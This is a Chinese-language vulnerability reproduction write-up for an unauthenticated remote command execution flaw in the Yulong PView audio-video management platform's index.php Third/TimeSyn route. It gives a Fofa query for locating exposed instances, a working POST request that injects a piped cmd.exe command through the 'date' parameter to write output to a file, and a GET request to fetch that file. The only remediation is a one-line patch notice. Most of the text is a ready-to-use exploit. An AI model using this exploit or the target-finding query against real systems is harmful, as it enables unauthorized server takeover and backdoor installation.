誉龙视音频 Third/TimeSyn 远程命令执行复现

0x01 漏洞描述：

誉龙公司定位为系统级的移动视音频记录解决方案提供商，凭借其深厚的行业经验，坚持自主研发，匠心打造记录仪领域行业生态，提供开放式的记录仪APK、GB28181 SDK、国网B协议、管理平台软件OEM。誉龙视音频综合管理平台 index.php 接口的Third/TimeSyn路由地址里存在远程命令执行漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。

0x02 搜索语句：

Fofa：body="PView 视音频管理平台"

0x03 漏洞复现：

POST /index.php?r=Third/TimeSyn HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencodedcloudKey=0x0&date=|cmd.exe+/c+whoami+>+test.txt&time=1

回显执行成功后拼接命令执行时写入的文件

GET /test.txt HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

0x04 修复建议：

厂商已发布补丁版本请及时修复